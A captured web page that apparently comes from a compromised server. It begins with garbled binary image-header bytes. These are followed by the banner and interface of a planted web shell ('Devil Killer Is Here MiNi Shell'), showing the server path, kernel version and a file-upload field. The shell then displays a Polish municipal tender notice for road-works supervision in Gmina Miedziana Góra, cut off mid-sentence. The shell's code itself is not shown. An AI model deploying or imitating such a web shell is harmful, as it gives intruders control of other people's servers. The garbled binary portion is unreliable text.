JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220207/0004843402-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Nadzór inwestorski nad inwestycją rozbudowy lokalnej infrastruktury drogowej w Gminie Miedziana Góra </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miedziana Góra</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Gm Miedziana Góra</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291010323</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Urzędnicza 18</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Miedziana Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-085</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">413031626</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@miedziana-gora.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.miedziana-gora.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Nadzór inwestorski nad inwestycją rozbudowy lokalnej infrastruktury drogowej w Gminie Miedziana Góra </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-90d1b33b-85a6-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00048434</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miedziana-gora.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miedziana-gora.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W niniejszym postępowaniu komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu następujących środków komunikacji elektr.:<br/>a) platformy do obsługi postępowań o udzielenie zamówienia publicznego, dostępnej pod adresem:<br/>https://miedziana-gora.ezamawiajacy.pl/servlet/HomeServlet (dalej jako Platforma);<br/>dopuszcza się komunikację na wskazane poniżej adresy e-mail:<br/>b) poczty elektronicznej: anna.szlefarska@miedziana-gora.pl, katarzyna.koziel@miedziana-gora.pl i anna.zolbach@miedziana-gora.pl<br/>- z zastrzeżeniem, że oferta, wraz z oświadczeniami, o których mowa w Sekcji VII pkt 1 SWZ, mają zostać przekazane wyłącznie za pomocą powyższej Platformy. Zgłoszenie do postępowania wymaga zarejestrowania Wyk. do<br/>systemu na subdomenie Gm.Miedziana Góra: https://miedziana-gora.ezamawiajacy.pl lub https://oneplace.marketplanet.pl Szczegółowo opisano w rozdziale XI SWZ!!! Zam. infor., że w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wyk. winien kont.się z dostawcą rozwiązania teleinformatycznego Platforma zakupowa Gmina Miedziana Góra tel.+48 22 257 22 23 (infolinia w dni rob., w godz. 9.00-17.00)e-mail: oneplace@marketplanet.pl Wykonawca winien korzystać z aktualnej Instrukcji dla Wykonawców dla postępowań opublikowanych od 01.01.2021 r., dostępnej z poziomu strefy publicznej w zakładce &#34;Regulacje i procedury procesu zakupowego&#34; na stronie: https://miedziana-gora.ezamawiajacy.pl. Dopuszczalny format kwalifikowanego podpisu elektronicznego, jako:a.dokumenty w formacie „pdf”zaleca się podpisywać formatem PAdES,b.dopuszcza się podpisanie dok. w formacie innym niż „pdf”,wtedy będzie wymagany oddzielny plik z podpisem. W zw. z tym Wyk. będzie zobowiązany zał.,oprócz podpisanego dokumentu oddzielny plik z podpisem.<br/>Zam. określa niezbędne wymagania sprzętowo – aplikacyjne umożliwiające pracę na PlatformieZakupowej, tj.: a. Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512<br/>kb/s; b. Komputer klasy PC lub MAC, o konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ,jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje; c.Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;d.Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf. Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w txt, rtf, pdf, xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc. Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.: a.Plik załączony przez Wyk. na Platf.Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otw.pliku dostępna jest po odszyfrowaniu przez Zam. po upływie terminu otwarcia ofert. Ozn. czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego<br/>serwera synchr. odpowiednim źródłem czasu.<br/>Ze względu na możliwość wprowadzenia ograniczonej ilości znaków w tym punkcie ogłoszenia, Zamawiający obowiązkowo odsyła Wykonawcę do szczegółowych zapisów w rozdziale XI SWZ!</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1) Administratorem Pani/Pana danych osobowych jest<br/>Gmina Miedziana Góra, ul. Urzędnicza 18, 26-085 Miedziana Góra;2) W sprawach z zakresu ochrony<br/>danych osobowych mogą Państwo kontaktować się z Inspektorem Ochrony Danych pod adresem<br/>email:<br/>inspektor@cbi24.pl3) Dane osobowe będą przetwarzane w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego.4) Dane osobowe będą przetwarzane przez okres zgodnie z art.<br/>78 ust. 1 i 4 ustawy z dnia z dnia 11 września 2019 r.– Prawo zamówień publicznych (Dz. U. z 2021 r.<br/>poz. 1129), zwanej dalej PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie<br/>zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>obowiązywania umowy.5) Podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. c) ww.<br/>Rozporządzenia w związku z przepisami PZP.6) Odbiorcami Pani/Pana danych będą osoby lub<br/>podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74<br/>ust. 4 PZP.7) Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana<br/>dotyczących jest wymogiem ustawowym określonym w przepisach PZP, związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z PZP.8) Osoba, której dane dotyczą ma prawo do:<br/>- dostępu do treści swoich danych oraz możliwości ich poprawiania, sprostowania, ograniczenia<br/>przetwarzania,<br/>- w przypadku gdy przetwarzanie danych odbywa się z naruszeniem przepisów Rozporządzenia służy<br/>prawo wniesienia skargi do organu nadzorczego tj. Prezesa Urzędu Ochrony Danych Osobowych, ul.<br/>Stawki 2, 00-193 Warszawa.<br/>Również:Odbiorcą Pani/Pana danych osobowych będzie spółka Otwarty Rynek Elektroniczny S.A. z<br/>siedzibą w Warszawie (02-672) przy ul. Domaniewskiej 49, wpisana do Rejestru Przedsiębiorców<br/>Krajowego Rejestru Sądowego, prowadzonego przez Sąd rejonowy dla m.st. Warszawy w Warszawie<br/>XIII Wydział Gospodarczy Krajowego Rejestru Sądowego pod numerem KRS: 0000041441, REGON:<br/>017282436, NIP: 526-25-35-153, jako właściciel Platformy Zakupowej, na której Gmina Miedziana<br/>Góra prowadzi postępowania o udzielenie zamówienia publicznego, działającą pod adresem:<br/>https://miedziana-gora.ezamawiajacy.pl<br/>Ze względu na możliwość wprowadzenia ograniczonej ilości znaków w tym punkcie ogłoszenia,<br/>Zamawiający obowiązkowo odsyła Wykonawcę do szczegółowych zapisów w SWZ w Sekcji XXIV.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IGPOS.271.5.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest 1 usługa nadzoru inwestorskiego nad inwestycją pn.: &#34;Rozbudowa lokalnej infrastruktury drogowej w Gminie Miedziana Góra w podziale na 4 zadania&#34;<br/>2.	Zakres przedmiotu zamówienia obejmuje:<br/>a) Pełnienie w pełnym zakresie nadzoru inwestorskiego nad robotami budowlanymi prowadzonymi podczas realizacji inwestycji w zakresie następujących specjalności:<br/>aa) drogowej,<br/>bb) mostowej,<br/>b) Zapewnienie wsparcia merytorycznego i osobiste uczestnictwo w ewentualnych negocjacjach Zamawiającego z poszczególnymi Wykonawcami robót budowlanych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71540000-5 - Usługi zarządzania budową</p> <p class="mb-0">71541000-2 - Usługi zarządzania projektem budowlanym</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1)	Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, w okresie 3 lat od dnia udzielenia zamówienia podstawowego. Zamówienia te polegać będą na powtórzeniu usługi nadzoru inwestorskiego nad robotami budowlanymi, stanowiącej przedmiot niniejszego zamówienia.<br/>2)	Zamówienia, o których mowa w ust. 14 pkt 1) będą polegały na powtórzeniu usługi nadzoru inwestorskiego zgodnego z zakresem usług stanowiących przedmiot niniejszego zamówienia, a więc nad robotami budowlanymi obejmującymi budowę lub rozbudowę lub przebudowę drogi/dróg. Zakresem usługi nadzoru inwestorskiego są czynności wskazane w pkt 2 (a i b) i pkt 5 (5.1 do 5.49) niniejszej SWZ.<br/>Zakres rzeczowy usługi stanowiącej przedmiot zamówień, o których mowa w ust. 14 pkt 2) nie przekroczy 20% szacowanej wartości zamówienia.<br/>3)	Zamówienia, o których mowa w pkt 1) będą udzielane po przeprowadzeniu odrębnego postępowania o udzielenie zamówienia publicznego w trybie z wolnej ręki, a jeżeli wartość szacunkowa będzie mniejsza od kwoty, o której mowa w art. 2 ust. 1 pkt. 1 ustawy Pzp – tylko po przeprowadzeniu negocjacji.<br/>4)	Zamówienia, o których mowa w pkt 1) będą udzielane w przypadku wystąpienia potrzeby zwiększenia zakresu rzeczowego usługi oraz gdy wystąpi potrzeba wykonania dodatkowego zakresu po dokonanym odbiorze końcowym.<br/>5)	Zamówienie, o którym mowa w pkt. 1) może obejmować rodzajowo cały lub częściowy zakres usług wskazanych w pkt. 2)</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami oceny ofert:<br/>1)	Cena brutto (C) - waga kryterium 60%;<br/>2)	Doświadczenie osób wyznaczonych do realizacji zamówienia – waga kryterium 40%<br/>2.	Zasady oceny ofert w poszczególnych kryteriach:<br/>Cena brutto za przedmiot zamówienia <br/>Liczba punktów = Cn/Cb x 60<br/>gdzie:<br/> - Cn – najniższa cena spośród wszystkich ofert nie odrzuconych<br/> - Cb – cena oferty badanej<br/> - 60 wskaźnik stały<br/>Doświadczenie osób wyznaczonych do realizacji zamówienia (inspektor nadzoru w specjalności inżynierii drogowej), w zakresie tego kryterium otrzyma:<br/>•	w nadzorowaniu 1 inwestycji polegającej na budowie lub przebudowie lub rozbudowie drogi/dróg, o wartości inwestycji nie mniejszej niż 250 000,00 zł brutto w okresie ostatnich 5 lat przed upływem terminu składania ofert - 0 pkt<br/>•	w nadzorowaniu 2-3 inwestycji polegających na budowie lub przebudowie lub rozbudowie drogi/dróg, o wartości inwestycji nie mniejszej niż 250 000,00 zł brutto każda w okresie ostatnich 5 lat przed upływem terminu składania ofert – 10 pkt<br/>•	w nadzorowaniu 4-5 inwestycji polegających na budowie lub przebudowie lub rozbudowie drogi/dróg, o wartości inwestycji nie mniejszej niż 250 000,00 zł brutto każda w okresie ostatnich 5 lat przed upływem terminu składania ofert – 20 pkt<br/>•	w nadzorowaniu 6 i więcej inwestycji polegających na budowie lub przebudowie lub rozbudowie drogi/dróg, o wartości inwestycji nie mniejszej niż 250 000,00 zł brutto każda w okresie ostatnich 5 lat przed upływem terminu składania ofert – 40 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia (inspektor nadzoru w specjalności inżynierii drogowej)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1.	Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie. Zamawiający nie dokona oceny spełnienia warunków udziału w postępowaniu.<br/>2.	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu Zamawiający żąda złożenia następujących podmiotowych środków dowodowych w zakresie:<br/>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie. Zamawiający nie dokona oceny spełnienia warunków udziału w postępowaniu.<br/>3.	Zdolności technicznej lub zawodowej:<br/>W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu Zamawiający żąda złożenia następujących podmiotowych środków dowodowych w zakresie:<br/>a)	wykonanych usług:<br/>Na potwierdzenie niniejszego warunku należy złożyć wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych, referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/><br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w tym okresie wykonał:<br/>i.	minimum 1 usługę w ramach, której pełnił nadzór inwestorski nad minimum 1 robotą budowlaną związaną z budową lub przebudową lub rozbudową drogi/dróg, w ramach której wykonano roboty związane z budową lub rozbudową lub przebudową mostu lub obiektu mostowego, gdzie wartość kosztorysowa pełnej roboty budowlanej (droga + most lub obiekt mostowy) wyniosła minimum 2 000 000,00 zł brutto,<br/>LUB<br/>ii.	minimum 1 usługę w ramach, której pełnił nadzór inwestorski nad minimum 1 robotą budowlaną związaną z budową lub przebudową lub rozbudową drogi/dróg, <br/>i <br/>iii.	minimum 1 usługę w ramach, której pełnił nadzór inwestorski nad minimum 1 robotą budowlaną związaną z budową lub przebudową lub rozbudową mostu lub obiektu mostowego, <br/>gdzie wartość kosztorysowa obu robót budowlanych razem wyniosła minimum 2 000 000,00 zł brutto.<br/>UWAGA: Za drogę Zamawiający uzna drogę w rozumieniu ustawy z dnia 21 marca 1985 r. o drogach publicznych (Dz.U z 2021 poz. 1376).<br/>Do pozycji wykazu należy załączyć dowody określające, czy usługi te zostały zakończone i wykonane w sposób należyty<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>- warunek określony w Rozdziale VI ust. 3 pkt a) ppkt i) musi być spełniony w całości min przez jednego z Wykonawców,<br/>- warunek określony w Rozdziale VI ust. 3 pkt a) ppkt ii) i iii) Wykonawcy mogą spełniać łącznie.<br/>b)	b)	wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia publicznego:<br/>Na potwierdzenie niniejszego warunku należy złożyć wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz <br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia <br/>i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/><br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje n/w osobami:<br/>iv.	co najmniej 1 osobą, która będzie pełnić funkcję zarówno inspektora nadzoru w specjalności inżynieryjnej drogowej jak i inspektora nadzoru w specjalności inżynieryjnej mostowej, osoba ta posiadać będzie:<br/>- uprawnienia budowlane do kierowania budowami w specjalności inżynieryjnej drogowej,<br/>- uprawnienia budowlane do kierowania budowami w specjalności inżynieryjnej mostowej,<br/>- posiada doświadczenie w nadzorowaniu lub kierowaniu robotami (jako kierownik budowy lub kierownik robót) w zakresie specjalności inżynieryjnej drogowej i mostowej na minimum:<br/>a) 1 inwestycji polegającej na budowie lub przebudowie lub rozbudowie drogi/dróg, o wartości nie mniejszej niż 250 000,00 zł brutto w okresie ostatnich 5 lat przed upływem terminu składania ofert i <br/>b) 1 inwestycji polegającej na budowie lub przebudowie lub rozbudowie mostu lub obiektu mostowego o wartości nie mniejszej niż 250 000,00 zł brutto w okresie ostatnich 5 lat przed upływem terminu składania ofert<br/> LUB<br/>v.	co najmniej jedną osobę, która będzie pełnić funkcję inspektora nadzoru w specjalności inżynieryjnej drogowej, osoba ta posiadać będzie:<br/>- uprawnienia budowlane do kierowania budowami w specjalności inżynieryjnej 